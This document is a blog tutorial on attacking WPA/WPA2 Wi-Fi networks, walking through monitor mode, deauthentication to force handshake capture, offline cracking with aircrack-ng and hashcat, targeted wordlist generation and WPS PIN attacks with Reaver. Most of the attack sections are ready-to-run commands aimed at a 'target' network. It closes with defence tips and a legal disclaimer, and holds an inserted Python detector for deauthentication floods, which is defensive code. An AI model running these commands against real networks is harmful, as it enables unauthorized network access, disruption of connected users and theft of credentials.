Wireless Network Hacking: WPA/WPA2 Attacks
Wireless Security

Master advanced techniques and methodologies in wireless security

Dec 21, 2025
18 min read
AlphaSploit Team

Understanding WPA/WPA2 Security

WPA (Wi-Fi Protected Access) and WPA2 are security protocols designed to protect wireless networks. While significantly more secure than WEP, they can still be vulnerable to certain attacks when weak passwords are used.

The most common attack vector involves capturing the four-way handshake that occurs when a client connects to the access point, then performing offline dictionary or brute-force attacks against the captured handshake.

Required Hardware and Tools

Essential equipment and software:

  • Wireless adapter supporting monitor mode and packet injection (e.g., Alfa AWUS036NHA)
  • Kali Linux or similar penetration testing distribution
  • Aircrack-ng suite for packet capture and analysis
  • Hashcat for GPU-accelerated password cracking
  • Large wordlist (rockyou.txt or custom wordlists)

Setting Up Monitor Mode

First, enable monitor mode on your wireless adapter to capture packets:

# Check wireless interfaces
iwconfig

# Kill interfering processes
airmon-ng check kill

# Enable monitor mode
airmon-ng start wlan0

# Verify monitor mode is active
iwconfig wlan0mon

Network Discovery

Scan for nearby wireless networks and identify your target:

# Start scanning for networks
airodump-ng wlan0mon

# Focus on specific channel and BSSID
airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w capture wlan0mon

Note the BSSID (MAC address) and channel of your target network. You'll need these for the handshake capture.

Capturing the Handshake

The four-way handshake occurs when a client connects to the access point. You can wait for a natural connection or force a deauthentication:

# Terminal 1: Capture packets
airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w capture wlan0mon

# Terminal 2: Send deauth packets
aireplay-ng --deauth 10 -a XX:XX:XX:XX:XX:XX wlan0mon

# You should see "WPA handshake: XX:XX:XX:XX:XX:XX" in airodump-ng

Understanding the Deauth Attack

The deauthentication attack forces connected clients to disconnect and reconnect, allowing you to capture the handshake during the reconnection process. Use this responsibly and only on networks you're authorized to test.
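The burst of deauthentication frames described above is also what a wireless IDS looks for. As an added example (not part of the original post), this Python script decodes raw 802.11 management frame headers and flags any BSSID that sees a burst of deauth/disassoc frames inside a sliding time window; the BSSIDs, client MAC and timestamps are constructed test data.

```python
import struct
from collections import defaultdict, deque

MGMT_TYPE = 0x00  # frame-control byte 0: bits 2-3 = type, bits 4-7 = subtype
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 0x0A, 0x0C

def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def parse_mgmt_frame(frame):
    """Decode a raw 802.11 header (no radiotap); None unless it is a management frame."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x03 != MGMT_TYPE:
        return None
    info = {"subtype": frame[0] >> 4, "dst": mac_str(frame[4:10]),
            "src": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22]), "reason": None}
    if info["subtype"] in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]  # reason code follows the header
    return info

def detect_deauth_flood(frames, threshold=5, window=1.0):
    """Return {bssid: peak_count} for BSSIDs with >= threshold deauth/disassoc frames in any window-second span."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in sorted(frames, key=lambda f: f[0]):
        f = parse_mgmt_frame(raw)
        if not f or f["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue  # beacons, probes etc. are ignored
        q = recent[f["bssid"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            alerts[f["bssid"]] = max(alerts.get(f["bssid"], 0), len(q))
    return alerts

def sample_deauth_frame(bssid, client, reason=7):
    """Constructed test input: FC 0xC0, duration, addr1=client, addr2/addr3=bssid, seq, reason."""
    return (struct.pack("<BBH", 0xC0, 0x00, 0x013A) + mac_bytes(client)
            + mac_bytes(bssid) * 2 + b"\x00\x00" + struct.pack("<H", reason))

AP, STA, OTHER_AP = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff", "66:77:88:99:aa:bb"  # constructed
SAMPLE_BEACON = struct.pack("<BBH", 0x80, 0, 0) + mac_bytes("ff:ff:ff:ff:ff:ff") + mac_bytes(AP) * 2 + b"\x00\x00"
# Ten deauths within one second from AP (flood) plus a lone deauth from OTHER_AP (normal roaming).
SAMPLE_FRAMES = [(0.1 * i, sample_deauth_frame(AP, STA)) for i in range(10)]
SAMPLE_FRAMES += [(0.05, SAMPLE_BEACON), (5.0, sample_deauth_frame(OTHER_AP, STA))]

if __name__ == "__main__":
    print(detect_deauth_flood(SAMPLE_FRAMES))  # {'00:11:22:33:44:55': 10}
```

On a real capture, feed it (timestamp, frame) pairs from a monitor-mode pcap with the radiotap header stripped. Enabling 802.11w (Protected Management Frames) on the access point is the standards-level mitigation that makes forged deauth frames ineffective.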

Cracking with Aircrack-ng

Use aircrack-ng with a wordlist to attempt password recovery:

# Basic dictionary attack
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b XX:XX:XX:XX:XX:XX capture-01.cap

# The process will show progress and display the key if found

Optimizing Aircrack-ng

# Use multiple CPU cores
aircrack-ng -w wordlist.txt capture-01.cap -p 4

# Combine multiple capture files
aircrack-ng -w wordlist.txt capture-*.cap

Advanced Cracking with Hashcat

For faster cracking using GPU acceleration, convert the capture to Hashcat format:

# Convert to hccapx format (older)
cap2hccapx capture-01.cap output.hccapx

# Or convert to the newer hashcat 22000 (PMKID/EAPOL) format, which is preferred
hcxpcapngtool -o output.22000 capture-01.cap

# Run hashcat with GPU acceleration (WPA2)
hashcat -m 22000 output.22000 /usr/share/wordlists/rockyou.txt

# Use rules for more combinations
hashcat -m 22000 output.22000 wordlist.txt -r rules/best64.rule

# Mask attack for known patterns
hashcat -m 22000 output.22000 -a 3 ?d?d?d?d?d?d?d?d

Hashcat Optimization

# Check available devices
hashcat -I

# Use specific GPU
hashcat -m 22000 -d 1 output.22000 wordlist.txt

# Adjust workload
hashcat -m 22000 -w 3 output.22000 wordlist.txt

Custom Wordlist Generation

Creating targeted wordlists increases the success rate:

# Use crunch for pattern generation (with -t, min and max length must equal the pattern length)
crunch 11 11 -t password@@@ > custom.txt

# Web scraping with cewl
cewl https://target-company.com -w company_wordlist.txt

# Combine and deduplicate wordlists
cat wordlist1.txt wordlist2.txt | sort -u > combined.txt

# Generate variations with John the Ripper
john --wordlist=wordlist.txt --rules --stdout > variations.txt

WPS Attacks as Alternative

If WPS is enabled, the network may be more vulnerable:

# Check for WPS
wash -i wlan0mon

# WPS PIN attack with Reaver
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv

# Pixie Dust attack (faster)
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -K

Defense Recommendations

Protect your wireless network:

  • Use WPA3 encryption when available
  • Create strong, complex passwords (minimum 12 characters with mixed case, numbers, symbols)
  • Change default SSID and disable SSID broadcast if possible
  • Enable MAC address filtering as an additional layer
  • Regularly update router firmware
  • Disable WPS if not needed
  • Use a separate guest network for visitors
  • Monitor connected devices regularly
  • Consider certificate-based authentication (WPA2-Enterprise)

Troubleshooting Common Issues

No Handshake Captured

  • Ensure you're on the correct channel
  • Verify there are active clients connected
  • Try a stronger deauth attack (increase the packet count)
  • Check if your adapter supports packet injection

Aircrack-ng Not Finding Key

  • Verify the handshake is valid by running aircrack-ng capture-01.cap without a wordlist
  • Try a different/larger wordlist
  • Consider using Hashcat for faster cracking
  • Generate custom wordlists based on target information

Monitor Mode Issues

  • Kill interfering processes: airmon-ng check kill
  • Restart network manager: systemctl restart NetworkManager
  • Check driver compatibility with your wireless adapter

Legal and Ethical Considerations

Only test wireless networks you own or have explicit written permission to test. Unauthorized access to wireless networks is illegal in most jurisdictions and can result in serious legal consequences.

Use these techniques responsibly for:

  • Legitimate security assessments
  • Educational purposes in controlled environments
  • Securing your own networks
  • Authorized penetration testing engagements

Always:

  • Obtain written authorization
  • Define scope clearly
  • Document all activities
  • Report findings professionally
  • Respect privacy and confidentiality

Conclusion

WPA/WPA2 attacks remain relevant in modern penetration testing. While WPA3 is being adopted, many networks still use older protocols. Understanding these attacks helps both offensive and defensive security practitioners.

Practice in controlled environments like your own lab, CTF platforms (TryHackMe, HackTheBox), or authorized security assessments before attempting real-world testing.

The best defense is strong passwords combined with additional security layers like network monitoring and regular security audits.